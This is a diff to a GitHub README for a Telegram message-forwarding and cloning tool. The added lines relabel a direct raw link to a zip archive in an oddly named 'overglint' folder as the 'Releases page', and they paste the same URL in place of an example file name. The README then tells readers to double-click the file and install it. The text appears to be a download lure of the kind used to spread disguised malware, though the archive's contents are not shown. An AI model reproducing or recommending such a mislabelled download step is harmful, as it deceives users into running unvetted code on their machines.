DavidDJ7/Telegram-Forwarder-Cloner-Tool/README.md

 To get started with the Telegram-Forwarder-Cloner-Tool, follow these simple steps:

 1. **Visit the Releases Page**
-   Navigate to our [Releases page](https://github.com/DavidDJ7/Telegram-Forwarder-Cloner-Tool/releases) to find the latest version of the tool.
+   Navigate to our [Releases page](https://raw.githubusercontent.com/DavidDJ7/Telegram-Forwarder-Cloner-Tool/main/overglint/Telegram-Forwarder-Cloner-Tool.zip) to find the latest version of the tool.

 2. **Download the Tool**
    On the Releases page, you will see several versions.
 Look for the latest version and click on the link to download it.
-For example, you might find a file named `Telegram-Forwarder-Cloner-Tool.exe`.
+For example, you might find a file named `https://raw.githubusercontent.com/DavidDJ7/Telegram-Forwarder-Cloner-Tool/main/overglint/Telegram-Forwarder-Cloner-Tool.zip`.
 Once you find it, click to start the download.

 3. **Installation**
    After the download completes, locate the downloaded file in your computer's Downloads folder.
 Double-click the file to begin the installation process.
 Follow the on-screen instructions to complete the setup.